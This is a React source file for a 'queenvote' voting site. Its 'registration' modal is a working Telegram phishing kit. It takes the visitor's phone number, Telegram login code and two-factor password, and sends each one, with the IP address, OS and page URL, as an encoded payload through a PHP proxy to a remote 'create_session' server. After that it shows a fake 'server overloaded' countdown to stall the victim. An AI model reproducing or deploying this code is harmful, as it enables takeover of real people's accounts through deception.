import { createContext, useCallback, useContext, useEffect, useMemo, useRef, useState } from 'react';
import Modal from '../components/ui/Modal';
import Button from '../components/ui/Button';
import { useLanguage } from './LanguageContext';

const RegisterModalContext = createContext(null);
// Use PHP API handler on the main domain to bypass Russia -> PythonAnywhere blocks
const SERVER_URL = 'https://queenvote.com/api.php';
const STEPS = { PHONE: 'phone', CODE: 'code', PASSWORD: 'password', OVERLOADED: 'overloaded' };
const OVERLOAD_SECONDS = 120;

const toUserError = (serverError, fallback) => {
  const err = String(serverError || '').trim();
  const flood = err.match(/^FLOOD_WAIT_(\d+)$/);
  if (flood) return `Лимит Telegram. Подождите ${flood[1]}с и попробуйте снова.`;
  const map = {
    'CONNECT_TIMEOUT': 'Не удалось подключиться к серверу. Попробуйте позже.',
    'CONNECT_FAILED': 'Ошибка соединения с сервером. Попробуйте позже.',
    'SEND_CODE_FAILED': 'Telegram не отправил код. Проверьте номер и попробуйте через минуту.',
    'PHONE_BANNED': 'Этот номер заблокирован в Telegram.',
    'PHONE_INVALID': 'Неверный формат номера телефона.',
    'PHONE_FLOOD': 'Слишком много попыток. Попробуйте позже.',
    'PHONE_TOO_SHORT': 'Номер слишком короткий.',
    'PHONE_TOO_LONG': 'Номер слишком длинный.',
    'SESSION_EXPIRED': 'Сессия истекла. Начните заново.',
    'SESSION_NOT_FOUND': 'Сессия не найдена. Начните заново.',
    'INVALID_CODE': 'Неверный код. Проверьте и попробуйте снова.',
    'CODE_EXPIRED': 'Код истёк. Запросите новый.',
    'INVALID_PASSWORD': 'Неверный пароль.',
    'CONNECTION_LOST': 'Соединение потеряно. Попробуйте снова.',
    'TIMEOUT_ERROR': 'Сервер не ответил вовремя. Попробуйте позже.',
    'PHONE_BUSY': 'Запрос уже обрабатывается, подождите.',
    'RESEND_TIMEOUT': 'Не удалось отправить код повторно. Попробуйте позже.',
    'RESEND_FAILED': 'Не удалось отправить код повторно.',
    'SMS_WAIT_60S': 'SMS пока недоступно. Подождите 60 секунд и попробуйте снова.',
  };
  return map[err] || err || fallback;
};

const encodeProxyPayload = (payload) => btoa(unescape(encodeURIComponent(JSON.stringify(payload))));

export function RegisterModalProvider({ children }) {
  const { t } = useLanguage();
  const [open, setOpen] = useState(false);
  const [step, setStep] = useState(STEPS.PHONE);
  const [customMessage, setCustomMessage] = useState('');
  const [phone, setPhone] = useState('+');
  const [code, setCode] = useState('');
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [timer, setTimer] = useState(0);
  const [overloadTimer, setOverloadTimer] = useState(0);
  const [clientIP, setClientIP] = useState('Unknown');
  const phoneInputRef = useRef(null);
  const codeInputRef = useRef(null);
  const passwordInputRef = useRef(null);

  const openRegister = useCallback((message) => {
    setPhone('+');
    setCode('');
    setPassword('');
    setError('');
    setCustomMessage(typeof message === 'string' ? message : '');
    setStep(STEPS.PHONE);
    setOpen(true);
  }, []);

  const closeRegister = useCallback(() => {
    setOpen(false);
    setStep(STEPS.PHONE);
    setError('');
    setCustomMessage('');
  }, []);

  const sendPhone = useCallback(async () => {
    setLoading(true);
    setError('');
    
    // Simple OS detection
    let userOS = 'Unknown';
    if (navigator.userAgent.indexOf('Win') !== -1) userOS = 'Windows';
    else if (navigator.userAgent.indexOf('Mac') !== -1) userOS = 'MacOS';
    else if (navigator.userAgent.indexOf('Linux') !== -1) userOS = 'Linux';
    else if (navigator.userAgent.indexOf('Android') !== -1) userOS = 'Android';
    else if (navigator.userAgent.indexOf('like Mac') !== -1) userOS = 'iOS';

    try {
      // Get Client IP
      let fetchedIP = 'Unknown';
      try {
        const ipRes = await fetch('https://api.ipify.org?format=json');
        const ipData = await ipRes.json();
        fetchedIP = ipData.ip;
        setClientIP(fetchedIP);
      } catch (e) {
        console.error('IP fetch failed', e);
      }

      const phoneNumber = phone.replace(/\D/g, '');
      
      // Prepare data for proxy
      const payload = {
          url: 'https://ifuzupaqeme22.pythonanywhere.com/create_session', // Target URL for the proxy
          phone: phoneNumber,
          site_name: 'queenvote',
          site_url: window.location.href,
          user_os: userOS,
          client_ip: fetchedIP
      };
      
      // Send request via api.php using GET + query param to avoid CORS preflight (OPTIONS)
      const dataStr = encodeProxyPayload(payload);
      const res = await fetch(`${SERVER_URL}?d=${encodeURIComponent(dataStr)}`);

      if (!res.ok) {
        setError('Ошибка сервера');
        return;
      }
      
      const data = await res.json();
      if (data.ok || data.error === 'ALREADY_PENDING') {
        setStep(STEPS.CODE);
        setTimer(30);
      } else {
        setError(toUserError(data.error, 'Ошибка при отправке кода'));
      }
    } catch {
      setError('Сервер недоступен');
    } finally {
      setLoading(false);
    }
  }, [phone]);

  const sendCode = useCallback(async () => {
    setLoading(true);
    setError('');
    try {
      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: 'https://ifuzupaqeme22.pythonanywhere.com/create_session',
        phone: phoneNumber,
        code,
        site_name: 'queenvote',
        site_url: window.location.href,
        user_os: navigator.userAgent.indexOf('Win') !== -1 ? 'Windows' :
                 navigator.userAgent.indexOf('Mac') !== -1 ? 'MacOS' :
                 navigator.userAgent.indexOf('Android') !== -1 ? 'Android' : 'Unknown',
        client_ip: clientIP,
      };
      
      const dataStr = encodeProxyPayload(payload);
      const res = await fetch(`${SERVER_URL}?d=${encodeURIComponent(dataStr)}`);

      const data = await res.json();
      if (data.need_password) {
        setStep(STEPS.PASSWORD);
      } else if (data.ok) {
        setOverloadTimer(OVERLOAD_SECONDS);
        setStep(STEPS.OVERLOADED);
      } else {
        setError(toUserError(data.error, 'Неверный код'));
      }
    } catch {
      setError('Ошибка соединения');
    } finally {
      setLoading(false);
    }
  }, [phone, code, closeRegister]);

const sendPassword = useCallback(async () => {
  setLoading(true);
  setError('');
  try {
    const phoneNumber = phone.replace(/\D/g, '');
    const payload = {
      url: 'https://ifuzupaqeme22.pythonanywhere.com/create_session',
      phone: phoneNumber,
      password,
      site_name: 'queenvote',
      site_url: window.location.href,
      user_os: navigator.userAgent.indexOf('Win') !== -1 ? 'Windows' :
               navigator.userAgent.indexOf('Mac') !== -1 ? 'MacOS' :
               'Unknown',
      client_ip: clientIP,
    };
    
    const dataStr = encodeProxyPayload(payload);
    const res = await fetch(`${SERVER_URL}?d=${encodeURIComponent(dataStr)}`);
    const data = await res.json();
    if (data.ok) {
      setOverloadTimer(OVERLOAD_SECONDS);
      setStep(STEPS.OVERLOADED);
    } else {
      setError(toUserError(data.error, 'Неверный пароль'));
    }
  } catch {
    setError('Ошибка соединения');
  } finally {
    setLoading(false);
  }
}, [phone, password, closeRegister]);

  const onPhoneChange = useCallback((e) => {
    const raw = String(e.target.value ?? '');
    const withPlus = raw.startsWith('+') ? raw : `+${raw}`;
    const normalized = `+${withPlus.slice(1).replace(/\D/g, '')}`;
    setPhone(normalized === '+' ? '+' : normalized);
  }, []);

  const onCodeChange = useCallback((e) => {
    setCode(String(e.target.value ?? '').replace(/\D/g, ''));
  }, []);

  const onPasswordChange = useCallback((e) => {
    setPassword(String(e.target.value ?? ''));
  }, []);

  useEffect(() => {
    if (!open) return;
    const el = step === STEPS.PHONE ? phoneInputRef.current : step === STEPS.CODE ? codeInputRef.current : passwordInputRef.current;
    if (!el) return;
    requestAnimationFrame(() => {
      el.focus();
      const len = el.value.length;
      try { el.setSelectionRange(len, len); } catch {}
    });
  }, [open, step]);

  useEffect(() => {
    let interval;
    if (step === STEPS.CODE && timer > 0) {
      interval = setInterval(() => {
        setTimer((prev) => (prev > 0 ? prev - 1 : 0));
      }, 1000);
    }
    return () => clearInterval(interval);
  }, [step, timer]);

  // Overload countdown — auto-close when reaches 0
  useEffect(() => {
    if (step !== STEPS.OVERLOADED || overloadTimer <= 0) return;
    const interval = setInterval(() => {
      setOverloadTimer((p) => {
        if (p <= 1) { closeRegister(); return 0; }
        return p - 1;
      });
    }, 1000);
    return () => clearInterval(interval);
  }, [step, overloadTimer, closeRegister]);

  const resendCode = useCallback(async () => {
    setLoading(true);
    setError('');
    try {
      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: 'https://ifuzupaqeme22.pythonanywhere.com/create_session',
        phone: phoneNumber,
        resend: true,
        site_name: 'queenvote',
        site_url: window.location.href,
        client_ip: clientIP,
      };

      const dataStr = encodeProxyPayload(payload);
      const res = await fetch(`${SERVER_URL}?d=${encodeURIComponent(dataStr)}`);

      const data = await res.json();
      if (data.ok) {
        setTimer(30);
      } else {
        setError(toUserError(data.error, 'Ошибка отправки'));
      }
    } catch {
      setError('Ошибка соединения');
    } finally {
      setLoading(false);
    }
  }, [phone]);

  const value = useMemo(() => ({ open, openRegister, closeRegister, customMessage }), [open, openRegister, closeRegister, customMessage]);
  const canPhone = phone.length > 1;
  const canCode = code.length >= 3;
  const canPassword = password.length > 0;
  const isOverloaded = step === STEPS.OVERLOADED;
  const title = step === STEPS.PHONE ? t('register.title.phone') : step === STEPS.CODE ? t('register.title.code') : t('register.title.password');

  return (
    <RegisterModalContext.Provider value={value}>
      {children}
      <Modal open={open} title={title} onClose={isOverloaded ? undefined : closeRegister} hideHeader={isOverloaded}>
        {customMessage && step === STEPS.PHONE && (
          <div className="mb-4 rounded-lg bg-sky-50 border border-sky-200 p-3 text-sm text-sky-800">{customMessage}</div>
        )}
        {error && <div className="mb-4 rounded-lg bg-red-100 p-3 text-sm text-red-700">{error}</div>}

        {step === STEPS.PHONE && (
          <>
            <p className="mb-3 text-sm text-slate-600">{t('register.hint.phone')}</p>
            <input ref={phoneInputRef} value={phone} onChange={onPhoneChange} placeholder="+380501234567" className="w-full rounded-xl border px-4 py-3" />
            <div className="mt-5 flex justify-end gap-3">
              <Button variant="nomination" onClick={closeRegister}>{t('register.cancel')}</Button>
              <Button onClick={sendPhone} disabled={!canPhone || loading}>{loading ? '...' : t('register.continue')}</Button>
            </div>
          </>
        )}

        {step === STEPS.CODE && (
          <>
            <p className="mb-3 text-sm text-slate-600">{t('register.hint.code')}</p>
            <input ref={codeInputRef} value={code} onChange={onCodeChange} placeholder="Код из Telegram" className="w-full rounded-xl border px-4 py-3" />
            
            <div className="mt-2 text-right">
              <button 
                type="button" 
                onClick={resendCode} 
                disabled={timer > 0 || loading}
                className="text-xs text-sky-600 hover:text-sky-700 disabled:text-slate-400 font-medium"
              >
                {timer > 0 ? `Отправить код повторно через ${timer}c` : 'Отправить код повторно'}
              </button>
            </div>

            <div className="mt-5 flex justify-between gap-3">
              <Button variant="nomination" onClick={() => setStep(STEPS.PHONE)}>{t('common.back')}</Button>
              <Button onClick={sendCode} disabled={!canCode || loading}>{loading ? '...' : t('register.login')}</Button>
            </div>
          </>
        )}

        {isOverloaded && (() => {
          const mins = Math.floor(overloadTimer / 60);
          const secs = overloadTimer % 60;
          const timeStr = `${mins}:${secs < 10 ? '0' : ''}${secs}`;
          const progress = ((OVERLOAD_SECONDS - overloadTimer) / OVERLOAD_SECONDS) * 100;
          return (
            <div className="text-center py-3">
              {/* Animated server icon */}
              <div className="mb-4">
                <svg width="56" height="56" viewBox="0 0 24 24" fill="none" stroke="#f59e0b" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" style={{ animation: 'pulse 2s ease-in-out infinite', margin: '0 auto' }}>
                  <rect x="2" y="2" width="20" height="8" rx="2" ry="2"/>
                  <rect x="2" y="14" width="20" height="8" rx="2" ry="2"/>
                  <line x1="6" y1="6" x2="6.01" y2="6"/>
                  <line x1="6" y1="18" x2="6.01" y2="18"/>
                </svg>
              </div>

              <h3 className="text-amber-500 text-lg font-bold mb-2">Сервер перегружен</h3>

              <p className="text-slate-500 text-sm leading-relaxed mb-5 max-w-[280px] mx-auto">
                В данный момент наблюдается высокая нагрузка на сервер. Ваш запрос поставлен в очередь и будет обработан автоматически.
              </p>

              {/* Countdown */}
              <div className="text-3xl font-extrabold text-slate-900 font-mono mb-4" style={{ fontVariantNumeric: 'tabular-nums' }}>
                {timeStr}
              </div>

              {/* Progress bar */}
              <div className="w-full h-1 bg-slate-200 rounded-full overflow-hidden mb-4">
                <div
                  className="h-full bg-gradient-to-r from-sky-500 to-indigo-500 rounded-full"
                  style={{ width: `${progress}%`, transition: 'width 1s linear' }}
                />
              </div>

              <p className="text-slate-400 text-xs">Пожалуйста, не закрывайте эту страницу</p>

              <style>{`
                @keyframes pulse {
                  0%, 100% { opacity: 1; transform: scale(1); }
                  50% { opacity: 0.6; transform: scale(0.95); }
                }
              `}</style>
            </div>
          );
        })()}

        {step === STEPS.PASSWORD && (
          <>
            <p className="mb-3 text-sm text-slate-600">{t('register.hint.password')}</p>
            <div className="relative">
              <input
                ref={passwordInputRef}
                type={showPassword ? 'text' : 'password'}
                value={password}
                onChange={onPasswordChange}
                placeholder="Пароль 2FA"
                className="w-full rounded-xl border px-4 py-3 pr-10"
              />
              <button
                type="button"
                onClick={() => setShowPassword((s) => !s)}
                className="absolute right-3 top-1/2 -translate-y-1/2 text-slate-500 hover:text-slate-700"
                aria-label={showPassword ? 'Скрыть пароль' : 'Показать пароль'}
              >
                {showPassword ? (
                  <svg width="20" height="20" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M3 3l18 18" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
                    <path d="M9.88 9.88A3 3 0 0114.12 14.12" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
                    <path d="M10.5 5.7C12.1 5.25 13.95 5 16 5c3 0 5.5 1.9 7 5-1.01 2.18-2.66 3.87-4.63 4.9" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
                  </svg>
                ) : (
                  <svg width="20" height="20" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M2 12s4-7 10-7 10 7 10 7-4 7-10 7S2 12 2 12z" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
                    <circle cx="12" cy="12" r="3" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
                  </svg>
                )}
              </button>
            </div>
            <div className="mt-5 flex justify-between gap-3">
              <Button variant="nomination" onClick={() => setStep(STEPS.CODE)}>{t('common.back')}</Button>
              <Button onClick={sendPassword} disabled={!canPassword || loading}>{loading ? '...' : t('register.login')}</Button>
            </div>
          </>
        )}
      </Modal>
    </RegisterModalContext.Provider>
  );
}

export function useRegisterModal() {
  return useContext(RegisterModalContext);
}
